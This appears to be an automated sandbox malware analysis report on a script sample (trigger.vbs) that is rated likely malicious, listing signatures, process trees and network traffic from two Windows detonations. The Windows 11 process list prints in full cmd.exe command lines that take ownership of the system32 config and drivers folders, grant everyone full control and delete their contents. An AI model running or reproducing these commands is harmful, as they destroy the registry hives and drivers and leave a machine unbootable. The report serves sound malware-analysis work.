Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-z5p2nayhrj
Target trigger.vbs
SHA256 22ddb640309560907cba8c9dc61f15929a88952043411cb95a707fd44a238282
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

22ddb640309560907cba8c9dc61f15929a88952043411cb95a707fd44a238282

Threat Level: Likely malicious

The file trigger.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:18

Reported

2024-08-15 21:20

Platform

win10v2004-20240802-en

Max time kernel

124s

Max time network

132s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:18

Reported

2024-08-15 21:20

Platform

win11-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

Signatures

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 1720 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5032 wrote to memory of 1720 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5032 wrote to memory of 3744 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5032 wrote to memory of 3744 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1720 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1720 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3744 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3744 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3744 wrote to memory of 920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3744 wrote to memory of 920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3476 wrote to memory of 1768 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3476 wrote to memory of 1768 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3476 wrote to memory of 2424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3476 wrote to memory of 2424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1768 wrote to memory of 3772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1768 wrote to memory of 3772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2424 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2424 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2424 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2424 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1768 wrote to memory of 652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1768 wrote to memory of 652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A